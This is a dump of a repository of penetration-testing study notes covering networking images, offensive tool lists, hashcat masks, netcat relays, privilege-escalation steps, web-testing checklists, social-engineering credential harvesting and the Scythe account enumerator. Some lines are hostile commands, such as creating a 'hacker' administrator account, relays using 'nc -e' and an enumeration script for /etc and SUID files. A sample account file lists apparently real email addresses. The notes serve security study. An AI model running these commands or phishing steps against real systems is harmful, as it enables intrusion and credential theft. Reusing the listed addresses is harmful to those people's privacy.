https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/43.png -------------------------------------------------------------------------------- /images/44.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/44.png -------------------------------------------------------------------------------- /images/FDDI_Dual_Token_Ring.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/FDDI_Dual_Token_Ring.jpg -------------------------------------------------------------------------------- /images/ICMP-Header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ICMP-Header.png -------------------------------------------------------------------------------- /images/IP-Header-v6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/IP-Header-v6.png -------------------------------------------------------------------------------- /images/IP-Header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/IP-Header.png -------------------------------------------------------------------------------- /images/TCP-Header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/TCP-Header.png -------------------------------------------------------------------------------- /images/UDP-Header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/UDP-Header.png -------------------------------------------------------------------------------- /images/active_passive_ftp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/active_passive_ftp.png -------------------------------------------------------------------------------- /images/arp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/arp.png -------------------------------------------------------------------------------- /images/broadcast_addresses.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/broadcast_addresses.png -------------------------------------------------------------------------------- /images/cable_categories.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/cable_categories.png -------------------------------------------------------------------------------- /images/cable_categories_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/cable_categories_2.png -------------------------------------------------------------------------------- /images/cidr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/cidr.png -------------------------------------------------------------------------------- /images/common_ports.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/common_ports.jpg -------------------------------------------------------------------------------- /images/dns.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/dns.png -------------------------------------------------------------------------------- /images/dns_hierarchy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/dns_hierarchy.png -------------------------------------------------------------------------------- /images/dns_security.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/dns_security.png -------------------------------------------------------------------------------- /images/encapsulation_decapcultations.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/encapsulation_decapcultations.png -------------------------------------------------------------------------------- /images/fddi_basic2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/fddi_basic2.gif -------------------------------------------------------------------------------- /images/ftp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ftp.png -------------------------------------------------------------------------------- /images/how_protocal_stacks_communicate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/how_protocal_stacks_communicate.png -------------------------------------------------------------------------------- /images/how_tcp_packets_are_created.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/how_tcp_packets_are_created.png -------------------------------------------------------------------------------- /images/icmp_header_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/icmp_header_2.png -------------------------------------------------------------------------------- /images/inside_stack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/inside_stack.png -------------------------------------------------------------------------------- /images/ip6_addressing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ip6_addressing.png -------------------------------------------------------------------------------- /images/ip6_features.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ip6_features.png -------------------------------------------------------------------------------- /images/ip6_vs_ip4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ip6_vs_ip4.png -------------------------------------------------------------------------------- /images/ip_osi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ip_osi.png -------------------------------------------------------------------------------- /images/ip_v6_addressing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ip_v6_addressing.png -------------------------------------------------------------------------------- /images/ipv6-ipv4-vs-ipv6-header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ipv6-ipv4-vs-ipv6-header.png -------------------------------------------------------------------------------- /images/mac_ip_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/mac_ip_1.png -------------------------------------------------------------------------------- /images/mac_ip_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/mac_ip_2.png -------------------------------------------------------------------------------- /images/network_design.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/network_design.png -------------------------------------------------------------------------------- /images/network_device.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/network_device.png -------------------------------------------------------------------------------- /images/new_breed_of_swithces.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/new_breed_of_swithces.png -------------------------------------------------------------------------------- /images/osi_model.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/osi_model.jpg -------------------------------------------------------------------------------- /images/osi_tcp_models.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/osi_tcp_models.png -------------------------------------------------------------------------------- /images/osi_vs_tcp_ip.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/osi_vs_tcp_ip.png -------------------------------------------------------------------------------- /images/ping.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ping.png -------------------------------------------------------------------------------- /images/ports_protocols.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ports_protocols.png -------------------------------------------------------------------------------- /images/private_addresses.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/private_addresses.png -------------------------------------------------------------------------------- /images/private_adresses.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/private_adresses.png -------------------------------------------------------------------------------- /images/routing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/routing.png -------------------------------------------------------------------------------- /images/subnet_classes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/subnet_classes.png -------------------------------------------------------------------------------- /images/tcp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/tcp.png -------------------------------------------------------------------------------- /images/tcp_close_connection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/tcp_close_connection.png -------------------------------------------------------------------------------- /images/tcp_connection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/tcp_connection.png -------------------------------------------------------------------------------- /images/tcp_header_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/tcp_header_2.png -------------------------------------------------------------------------------- /images/tcp_uses.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/tcp_uses.png -------------------------------------------------------------------------------- /images/tcp_vs_udp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/tcp_vs_udp.png -------------------------------------------------------------------------------- /images/traceroute.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/traceroute.png -------------------------------------------------------------------------------- /images/udp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/udp.png -------------------------------------------------------------------------------- /images/udp_header_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/udp_header_2.png -------------------------------------------------------------------------------- /images/upd_uses.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/upd_uses.png -------------------------------------------------------------------------------- /images/vlan_nac.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/vlan_nac.png -------------------------------------------------------------------------------- /md_tree.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #File: tree-md 4 | 5 | tree=$(tree -f --noreport -I '*~|.*|*.png|*.pdf|*.txt|*.jpg|*.svg|*.gif|images|LICENSE|md_tree*' -L 3 --charset ascii $1 | 6 | sed -e 's/| \+/ /g' -e 's/[|`]-\+/ */g' -e 's:\(* \)\(\(.*/\)\([^/]\+\)\):\1[\4](\2):g') 7 | 8 | printf "# Penetration Testing Study Notes\n\nThis repo contains all my penetration testing study notes, penetration testing tools, scripts, techniques, tricks and also many scripts that I found them useful from all over the internet.\n\n## Table of Contents\n\n${tree}" 9 | -------------------------------------------------------------------------------- /networking/nmap_quick_reference_guide.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/networking/nmap_quick_reference_guide.pdf -------------------------------------------------------------------------------- /networking/tcpdump.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/networking/tcpdump.pdf -------------------------------------------------------------------------------- /os/preparing_windows.md: -------------------------------------------------------------------------------- 1 | # Windows machine setup 2 | 3 | I’ll install the following: 4 | 5 | 1. HxD http://mh-nexus.de/en/hxd/ 6 | 7 | 2. Evade https://www.securepla.net/antivirus-now-you-see-me-now-you-dont/ 8 | 9 | 3. Hyperion http://www.nullsecurity.net/tools/binary.html 10 | 11 | - Download/install a Windows Compiler http://sourceforge.net/projects/mingw/ 12 | - Run “make” in the extracted Hyperion folder and you should have the binary. 13 | 14 | 4. Download and install Metasploit http://www.Metasploit.com/ 15 | 16 | 5. Download and install either Nessus or Nexpose 17 | 18 | - If you are buying your own software, you should probably look into Nessus as it is much cheaper, but both work well 19 | 20 | 6. Download and install nmap http://nmap.org/download.html 21 | 22 | 7. Download and install oclHashcat http://hashcat.net/oclhashcat/#downloadlatest 23 | 24 | 8. Download and install evil foca http://www.informatica64.com/evilfoca/ 25 | 26 | 9. Download and install Cain and Abel http://www.oxid.it/cain.html 27 | 28 | 10. BURP http://portswigger.net/burp/download.html 29 | 30 | 11. Download and extract Nishang: https://code.google.com/p/nishang/downloads/list 31 | 32 | 12. Download and extract PowerSploit: https://github.com/mattifestation/PowerSploit/archive/master.zip 33 | 34 | 13. Installing Firefox Addons 35 | 36 | - Web Developer Add-on: https://addons.mozilla.org/en-US/firefox/addon/web-developer/ 37 | - Tamper Data: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ 38 | - Foxy Proxy: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ 39 | - User Agent Switcher: https://addons.mozilla.org/en-US/firefox/addon/user-agentswitcher/ 40 | -------------------------------------------------------------------------------- /password_attack/common_password_topologies.txt: -------------------------------------------------------------------------------- 1 | ?u?l?l?l?l?l?d?d 2 | ?u?l?l?l?l?l?l?d?d 3 | ?u?l?l?l?d?d?d?d 4 | ?l?l?l?l?l?l?l?d 5 | ?u?l?l?l?l?l?l?l?d?d 6 | ?u?l?l?l?l?l?l?d 7 | ?u?l?l?l?l?l?d?d?d?d 8 | ?u?l?l?l?l?d?d?d?d 9 | ?l?l?l?l?l?l?d?d 10 | ?u?l?l?l?l?l?l?l?d 11 | ?u?l?l?l?l?d?d?d 12 | ?u?l?l?d?d?d?d?s 13 | ?l?l?l?l?l?l?l?l 14 | ?u?l?l?l?l?l?d?d?d 15 | ?l?l?l?l?l?l?l?d?d 16 | ?l?l?s?d?d?l?d?d?l 17 | ?l?l?l?l?l?l?l?l?d 18 | ?u?l?l?l?l?l?d?d?s 19 | ?u?l?l?l?l?l?l?d?d?d?d 20 | ?u?l?l?l?l?l?l?l?l?d?d 21 | ?u?l?l?l?l?l?d?s 22 | ?u?l?l?l?l?l?l?l?l?d 23 | ?u?l?l?l?l?l?d?d?d?d?s 24 | ?l?l?l?l?l?l?l?l?l 25 | ?l?l?l?l?l?l?l?l?d?d 26 | ?u?l?l?l?l?l?l?d?d?d 27 | ?l?l?l?l?l?d?d?d 28 | ?u?l?l?l?d?d?d?d?s 29 | ?u?l?l?l?l?l?l?l?d?d?d?d 30 | ?u?l?l?l?l?l?s?d?d 31 | ?u?u?u?u?u?u?d?l 32 | ?l?l?l?l?d?d?d?d 33 | ?d?d?u?l?l?l?l?l?l?l 34 | ?u?l?l?s?d?d?d?d 35 | ?u?l?l?l?l?d?d?s 36 | ?u?l?l?l?l?l?l?d?s 37 | ?d?d?u?l?l?l?l?l?l 38 | ?l?l?l?l?s?d?d?d 39 | ?l?l?l?l?l?l?l?l?l?d 40 | ?l?l?l?l?l?d?d?d?d 41 | ?l?l?l?l?l?l?l?l?l?l 42 | ?l?l?l?l?l?l?d?d?d 43 | ?u?l?l?l?l?l?l?l?l?l?d?d 44 | ?u?l?l?l?l?l?l?l?l?l?d 45 | ?d?d?d?d?d?d?u?l 46 | ?u?l?l?l?l?l?l?l?d?d?d 47 | ?u?l?l?l?l?l?l?d?d?s 48 | ?u?u?u?u?u?u?d?s 49 | ?u?u?d?l?l?l?d?d?d?u 50 | ?u?l?l?l?l?s?d?d 51 | ?u?l?l?l?l?l?s?d 52 | ?l?l?l?s?d?d?d?d 53 | ?l?l?l?l?l?l?d?d?d?d 54 | ?u?l?l?l?l?l?l?l?d?d?s 55 | ?d?d?u?l?l?l?l?l 56 | ?u?l?l?l?l?l?l?l?d?s 57 | ?u?l?l?l?l?d?d?d?s 58 | ?u?l?l?l?l?d?d?d?d?s 59 | ?u?l?l?l?s?d?d?d?d 60 | ?u?l?l?l?l?s?d?d?d 61 | ?u?l?l?l?l?l?l?d?d?d?d?s 62 | ?u?l?l?l?d?d?d?s 63 | ?l?l?l?l?s?d?d?d?d 64 | ?l?l?l?l?l?l?s?d?d 65 | ?l?l?l?l?l?l?d?d?s 66 | ?d?d?d?d?u?l?l?l 67 | ?d?d?d?d?d?d?d?d 68 | ?u?l?l?l?l?l?l?s?d 69 | ?u?l?d?d?d?d?d?d 70 | ?l?l?l?l?l?l?s?d 71 | ?u?d?l?l?l?l?l?l?l?d 72 | ?l?l?l?l?l?l?l?l?l?l?l 73 | ?l?l?l?l?l?l?l?l?l?l?d 74 | ?l?l?l?l?l?d?d?s 75 | ?l?l?l?l?d?d?d?s 76 | ?u?l?l?l?l?l?l?l?l?d?d?d?d 77 | ?u?u?u?u?u?u?u?u 78 | ?u?l?l?l?s?d?d?d 79 | ?u?l?l?l?l?l?l?s?d?d 80 | ?u?l?l?l?l?l?d?d?d?s 81 | ?l?l?l?l?l?s?d?d 82 | ?u?l?l?l?l?s?d?d?d?d 83 | ?u?l?l?l?d?d?d?d?d 84 | ?u?l?l?d?d?d?d?d?d 85 | ?u?l?l?d?d?d?d?d 86 | ?l?l?l?l?l?l?l?l?l?d?d 87 | ?l?l?l?l?l?l?l?d?d?s 88 | ?l?l?l?l?l?l?l?d?d?d 89 | ?l?l?l?l?l?l?d?s 90 | ?l?l?l?d?d?d?d?s 91 | ?u?u?u?l?l?l?d?d?d?d 92 | ?u?l?l?l?l?l?s?d?d?d 93 | ?u?l?l?l?l?l?l?l?s?d 94 | ?l?l?l?l?l?l?l?l?s?d 95 | ?l?l?l?l?l?l?l?d?d?d?d 96 | ?u?l?l?l?l?l?s?d?d?d?d 97 | ?l?l?l?l?l?l?l?d?s 98 | ?l?l?l?l?d?d?d?d?s 99 | ?d?d?d?d?u?l?l?l?l 100 | ?u?u?d?l?l?l?d?d?d?d 101 | -------------------------------------------------------------------------------- /port_forwarding/nc_relays.txt: -------------------------------------------------------------------------------- 1 | ----------LINUX---------- 2 | Create named pipe 3 | cd /tmp 4 | mknod [name] p 5 | 6 | Listener to Client----- 7 | nc -nvlp [local port] 0<[named pipe] | nc [target IP] [port] | tee [named pipe] 8 | Sends packets from [local port] to a nc client connected to [target IP] on [port] 9 | Listener to Listener----- 10 | nc -nvlp [local port 1] 0<[named pipe] | nc -nvlp [local port 2] | tee [named pipe] 11 | Sends packets from any connection on [local port 1] to any connection on [local port 2] 12 | Client to Client----- 13 | nc [previous hop] [port 1] 0<[named pipe] | nc [next hop] [port 2] | tee [named pipe] 14 | Sends packets from connection to [previous hop] on [port 1] to [next hop] on [port 2] 15 | 16 | ----------WINDOWS---------- 17 | Enter temporary directory to create .bat files 18 | cd C:\temp 19 | 20 | Listener to Client----- 21 | echo nc [target IP] [port] > relay.bat 22 | nc -lp [local port] -e relay.bat 23 | Sends packets from [local port] to a nc client connected to [target IP] on [port] 24 | Listener to Listener----- 25 | echo nc -lp [local port 2] > relay.bat 26 | nc -lp [local port 1] -e relay.bat 27 | Sends packets from any connection on [local port 1] to any connection on [local port 2] 28 | Client to Client----- 29 | echo nc [next hop] [port 2] > relay.bat 30 | nc [previous hop] [port 1] -e relay.bat 31 | Sends packets from connection to [previous hop] on [port 1] to [next hop] on [port 2] 32 | -------------------------------------------------------------------------------- /priv_escalation/Privilege_Escalation.md: -------------------------------------------------------------------------------- 1 | # Privilege Escalation 2 | 3 | ## Privilege Escalation Exploits in Linux 4 | 5 | You have ssh credentials for a user and want to use machine to pivot but you do not have root privileges 6 | 7 | * Check kernel version 8 | * look under exploit db 9 | 10 | download exploit to victim machine and compile 11 | 12 | ## Privilege Escalation Exploit in Windows 13 | 14 | MS11-080 Afd.sys python script 15 | 16 | `python pyinstaller.py --onefile ms11-080.py` 17 | * to convert to exe 18 | 19 | `net user hacker hacker /add` 20 | 21 | `net localgroup administrators hacker /add` 22 | 23 | ## Abusing weak Service Permissions on Windows 24 | 25 | 26 | 27 | ## Abusing weak Service Permissions on Linux 28 | -------------------------------------------------------------------------------- /priv_escalation/Privledge_Logic_Transport.md: -------------------------------------------------------------------------------- 1 | # Privilege, Transport, Logic 2 | 3 | ## Privilege 4 | 5 | Often logic, priv, auth bugs are blurred. 6 | 7 | Testing user priv: 8 | - admin has power 9 | - peon has none 10 | - peon can use function only meant for admin 11 | 12 | ## More Privilege 13 | 14 | - Find site functionality that is restricted to certain user types 15 | - Try accessing those functions with lesser/other user roles 16 | - Try to directly browse to views with sensitive information as a lesser priv user 17 | 18 | Autorize Burp plugin is pretty neat [here] (https://github.com/Quitten/Autorize). 19 | 20 | ## Common Functions or Views 21 |  22 | - Add user function 23 | - Delete user function 24 | - start project / campaign / etc function 25 | - change account info (pass, CC, etc) function 26 | - customer analytics view 27 | - payment processing view 28 | - any view with PII 29 | 30 | ## Insecure direct object references 31 | 32 | IDORs are common place in bounties, and hard to catch with scanners. 33 | 34 | Find *any and all* UIDs 35 | - increment 36 | - decrement 37 | - negative values 38 | - Attempt to perform sensitive functions substituting another UID 39 | - change password 40 | - forgot password 41 | - admin only functions 42 | 43 | Common Functions , Views, or Files: 44 | - Everything from the CSRF Table, trying cross account attacks 45 | - Sub: UIDs, user hashes, or emails 46 | - Images that are non-public 47 | - Receipts 48 | - Private Files (pdfs, ++) 49 | - Shipping info & Purchase Orders 50 | - Sending / Deleting messages 51 | 52 | ## Transport 53 | 54 | Most security concerned sites will enable HTTPs. It’s your job to ensure they’ve done it *EVERYWHERE*. Most of the time they miss something. 55 | 56 | Examples: 57 | - Sensitive images transported over HTTP 58 | - Analytics with session data / PII leaked over HTTP 59 | 60 | (ForceSSL) [https://github.com/arvinddoraiswamy/mywebappscripts/tree/master/ForceSSL] 61 | 62 | ## Business Logic Flaws 63 | Logic flaws that are tricky, mostly manual: 64 | - substituting hashed parameters 65 | - step manipulation 66 | - use negatives in quantities 67 | - authentication bypass 68 | - application level DoS 69 | - Timing attacks 70 | -------------------------------------------------------------------------------- /priv_escalation/escalation_gathering.sh: -------------------------------------------------------------------------------- 1 | #Script to gathering information in a privilege escalation 2 | 3 | #!/bin/sh 4 | echo Distribution and kernel version 5 | cat /etc/issue 6 | uname -a 7 | 8 | echo Mounted filesystems 9 | mount -l 10 | 11 | echo Network configuration 12 | ifconfig -a 13 | cat /etc/hosts 14 | arp 15 | 16 | echo Development tools availability 17 | which gcc 18 | which g++ 19 | which python 20 | 21 | echo Installed packages (Ubuntu) 22 | dpkg -l 23 | 24 | echo Services 25 | netstat -tulnpe 26 | 27 | echo Processes 28 | ps -aux 29 | 30 | echo Scheduled jobs 31 | find /etc/cron* -ls 2>/dev/null 32 | find /var/spool/cron* -ls 2>/dev/null 33 | 34 | echo Readable files in /etc  35 | find /etc -user `id -u` -perm -u=r \ 36 | -o -group `id -g` -perm -g=r \ 37 | -o -perm -o=r \ 38 | -ls 2>/dev/null  39 | 40 | echo SUID and GUID writable files 41 | find / -o -group `id -g` -perm -g=w -perm -u=s \ 42 | -o -perm -o=w -perm -u=s \ 43 | -o -perm -o=w -perm -g=s \ 44 | -ls 2>/dev/null  45 | 46 | echo SUID and GUID files 47 | find / -type f -perm -u=s -o -type f -perm -g=s \ 48 | -ls 2>/dev/null 49 | 50 | echo Writable files outside HOME 51 | mount -l find / -path “$HOME” -prune -o -path “/proc” -prune -o \( ! -type l \) \( -user `id -u` -perm -u=w  -o -group `id -g` -perm -g=w  -o -perm -o=w \) -ls 2>/dev/null 52 | -------------------------------------------------------------------------------- /social_engineering/social_engineering.md: -------------------------------------------------------------------------------- 1 | # Social Engineering ( cybrary course ) 2 | 3 | ## Google Dorks 4 | 5 | ## Maltego 6 | 7 | This tool allows you to visualize the relationships between and among various bits of information, which Maltego calls entities, that you discover about the target of a Social Engineering Audit. 8 | 9 | ## Recon-NG is used for gathering information that is accessed through the Kali Tools Web site. 10 | 11 | - creating and using a workspace — you can create workspaces to organize your activities on a case-by-case basis, which increases the tool’s functionality 12 | - how to show modules by running the Show Command (he recommends that you try all of the modules separately to learn a great deal about your target) 13 | - using the netcraft command 14 | - using the run command 15 | - using the load command 16 | - using the resolve command 17 | - using the add and delete commands to configure lists 18 | 19 | ## Social Engineering Toolkit (SE Toolkit) 20 | 21 | - run the SE Toolkit 22 | - trick your target into signing into a malicious Web site so that you can obtain their credentials 23 | - use Web site attack factors 24 | - perform SE attacks such as spearfishing 25 | - trick your target into providing credentials by using the credential harvester 26 | - use the tab nabbing tool 27 | - use CTRL-SHIFT-T to open a new tab in your browser 28 | - use the various templates 29 | - choose the proper Web server for your activity 30 | - clone a Web site to use to trick your target 31 | - use the tiny URL Web site to streamline your process 32 | - understand the security risks of using the tiny URL Web site 33 | - communicate with your target to trigger them to go to the cloned Web site 34 | - authenticate to the target’s true Web site using their own credentials 35 | 36 | ## Cupp (Common User Password Profiler) ( from github) 37 | 38 | This tool allows you to generate a list of possible passwords to use in the Dictionary file. The Dictionary file(s) can be expanded as more information is gathered. 39 | 40 | ## Cewl 41 | 42 | a simple and useful tool for generating word lists for use with a password cracking tool. 43 | 44 | ## Shodan (www.shodan.io) 45 | 46 | Shodan crawls the Internet and identifies IP addresses that have a service running. Then it does a banner grab of the service that is running, and it saves the banner information. You can search on a keyword or an IP address to find the services that are running. 47 | 48 | ## Scythe 49 | 50 | an interesting account enumerator tool that allows you to do account harvesting. You will use this tool to find out where your target has accounts on various Web sites. 51 | You install Scythe into your Kali instance from GitHub using the following steps: 52 | · Go to www.GitHub.com 53 | · Enter Scythe into the site’s search function 54 | · Choose ChrisJohnRiley/Scythe from the list that is returned 55 | 56 | ## Creepy 57 | 58 | The Web site www.geocreepy.com provides a useful tool that allows you to do geolocation for a target by using various social networking platforms to track individuals. Creepy works with Twitter, Flickr, Instagram, and Google Plus. 59 | 60 | ## Generate all possible Emails for a specific user 61 | 62 | [spread sheet](https://docs.google.com/spreadsheets/d/1iuEh3h3tekNaw5liAirkQlPZ5oaW_9MS37lsPpTV5Xk/edit#gid=0) 63 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/README.md: -------------------------------------------------------------------------------- 1 | Scythe 2 | ====== 3 | 4 | scythe: account enumerator 5 | 6 | Account Enumerator is designed to make it simple to perform account 7 | enumeration as part of security testing. The framework offers the ability 8 | to easily create new modules (XML files) and speed up the process of testing. 9 | 10 | This tool was created with 2 main use cases in mind: 11 | 12 | - The ability to test a range of email addresses across a range of sites (e.g. 13 | social media, blogging platforms, etc...) to find where those targets have 14 | active accounts. This can be useful in a social engineering test where you 15 | have email accounts for a company and want to list where these users have 16 | used their work email for 3rd party web based services. 17 | 18 | - The ability to quickly create a custom testcase module and use it to enumerate 19 | for a list of active accounts. Using either a list of know usernames, email 20 | addresses, or a dictionary of common account names. 21 | 22 | This program is released as is and is not designed to be used to test again sites 23 | where you do not have permission. Any modules provided are for demonstration purposes 24 | and may breach end user license agreements if used against a site. Your mileage may 25 | vary... be responsible! 26 | 27 | External module depenancies: 28 | colorama (Windows only, optional) 29 | 30 | Example Usage: 31 | ============== 32 | 33 | > List available modules 34 | 35 | ./scythe.py -l 36 | 37 | > Check account list against facebook 38 | 39 | ./scythe.py --single facebook.com --accountfile=accountfile.txt 40 | 41 | > Check account list against facebook (using threads, w/ summary output) 42 | 43 | ./scythe.py --single facebook.com --accountfile=accountfile.txt --threads 4 --summary 44 | 45 | > Check account list against all modules in the social and blogs categories (w/ summary output) 46 | 47 | ./scythe.py --category=social,blogs --accountfile=accountfile.txt --summary 48 | 49 | > Check specific accounts against facebook 50 | 51 | ./scythe.py --single facebook.com --account=testuser,testuser2 52 | 53 | > Check account list against facebook (output to logfile) 54 | 55 | ./scythe.py --single facebook.com --accountfile=accountfile.txt --output=logfile.txt 56 | 57 | > Check accounts in the command line against Wordpress.com (3 retries, 60 second retry wait) 58 | 59 | ./scythe.py --single facebook.com --account=testuser,testuser1,testuser2 --retries=3 --retrytime=60 60 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/accountfile.txt: -------------------------------------------------------------------------------- 1 | odyssomay 2 | odyssomay@gmail.com 3 | reikaff@gmail.com 4 | midorisalt@gmail.com 5 | elinff@gmail.com 6 | jonathanff@gmail.com 7 | reikaff 8 | midorisalt 9 | jonathanfischerfriberg 10 | ElinFischerFriberg 11 | elinff 12 | jonathanff 13 | 14 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/license: -------------------------------------------------------------------------------- 1 | Copyright (C) 2012, Chris John Riley 2 | 3 | All rights reserved. 4 | 5 | Redistribution and use in source and binary forms, with or without 6 | 